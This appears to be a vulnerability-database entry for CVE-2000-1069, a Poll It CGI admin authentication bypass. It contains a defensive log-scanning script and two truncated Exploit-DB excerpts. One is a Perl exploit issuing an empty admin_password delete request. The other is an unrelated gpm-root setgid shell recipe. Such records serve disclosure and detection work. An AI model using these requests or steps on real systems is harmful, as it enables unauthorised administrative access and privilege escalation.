CVE-2000-1069
Published 2000-12-11
Priority: P4 31
Severity: medium, 6.4 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Exploit available
EPSS: 2.27% (80.9th percentile)
pollit.cgi in Poll It 2.01 and earlier allows remote attackers to access administrative functions without knowing the real password by specifying the same value to the entered_password and admin_password parameters.
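A log-review sketch for the behaviour described above, added here as an example and not taken from this record, from Poll It, or from any published rule. It assumes Common/Combined Log Format access logs, that legitimate clients never send an `admin_password` parameter, and that the script is reached as `pollit.cgi`. The function names and sample lines are constructed. Access logs do not record POST bodies, so this covers only requests made with a query string.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client, request target and status from a Common/Combined Log Format line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def classify(line, script="pollit.cgi"):
    """Return (client, status, verdict) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode the path so an encoded script name (pollit%2Ecgi) is not missed.
    if not unquote(url.path).lower().endswith("/" + script):
        return None
    # parse_qsl decodes parameter names (admin%5Fpassword) and keeps empty values.
    params = parse_qsl(url.query, keep_blank_values=True)
    supplied = [v for k, v in params if k == "admin_password"]
    if not supplied:
        return None  # ordinary request: the client did not name the secret
    # Assumption: an absent entered_password is compared as the empty string.
    entered = [v for k, v in params if k == "entered_password"] or [""]
    # "match" is the condition in the CVE text; "override" is any other attempt.
    verdict = "match" if set(entered) & set(supplied) else "override"
    return (m["client"], int(m["status"]), verdict)

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2000:09:00:01 +0000] "GET /cgi-bin/pollit.cgi?load=vote&choice=2 HTTP/1.0" 200 512',
    '203.0.113.7 - - [11/Dec/2000:09:02:13 +0000] "GET /cgi-bin/pollit.cgi?load=admin&admin_password=&action=delete_poll HTTP/1.0" 200 734',
    '203.0.113.7 - - [11/Dec/2000:09:02:40 +0000] "GET /cgi-bin/pollit.cgi?load=admin&entered_password=x&admin%5Fpassword=x HTTP/1.0" 200 690',
    '198.51.100.4 - - [11/Dec/2000:09:05:02 +0000] "GET /cgi-bin/pollit.cgi?load=admin&entered_password=a&admin_password=b HTTP/1.0" 403 120',
    '192.0.2.10 - - [11/Dec/2000:09:06:00 +0000] "GET /index.html?admin_password=1 HTTP/1.0" 200 99',
]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(f"{client} status={status} admin_password {verdict}")
```

A hit with a 2xx status on an installation running 2.01 or earlier is the case to investigate first.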
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cgi-world | poll_it | — | — |
| cgi-world | poll_it | — | — |
| cgi-world | poll_it_pro | — | — |
No detection rules found.
Exploit-DB
Poll It CGI 2.0 - Multiple Vulnerabilities
exploitdb·2000-11-15
---
#!/usr/bin/perl
######################################
# #
# #
# Poll It CGI v2.0 exploit #
# keelis/havoc korp 2000 #
# #
# shouts to modjo, p, zen, kd, #
# ab, all the script kiddies. #
# #
# #
# keelis(at)hushmail(dot)com #
# #
# #
######################################
use Socket;
($host, $cgi_loc) = @ARGV[0,1];
$ip=inet_aton($host);
print("\n\t+--- Poll It CGI v2.0 exploit ---+");
print("\n\t+--- keelis/havoc korp 2000 ---+\n\n\n");
usage() if (!defined($host) || !defined($cgi_loc));
while(true)
{
print "[poll\@$host] ";
$stdin = \*STDIN;
$cmdin = <$stdin>;
chomp($cmdin);
($cmd, $param) = split(/ /, $cmdin, 2);
if ($cmd eq "d")
{
$request = "?load=admin&admin_password=&action=delete_poll";
$success_msg = "current poll has been deleted
Exploit-DB
gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid
exploitdb·2000-03-22
---
source: https://www.securityfocus.com/bid/1069/info
A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error: the programmer attempted to revert to the running user's groups after having already called setuid to the user's ID. The setgid call fails, and the process keeps the groups that the gpm-root program is running as. This is usually the 'root' group.
This vulnerability requires that the user have console access.
cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chm
No writeups or analysis indexed.
Published: 2000-12-11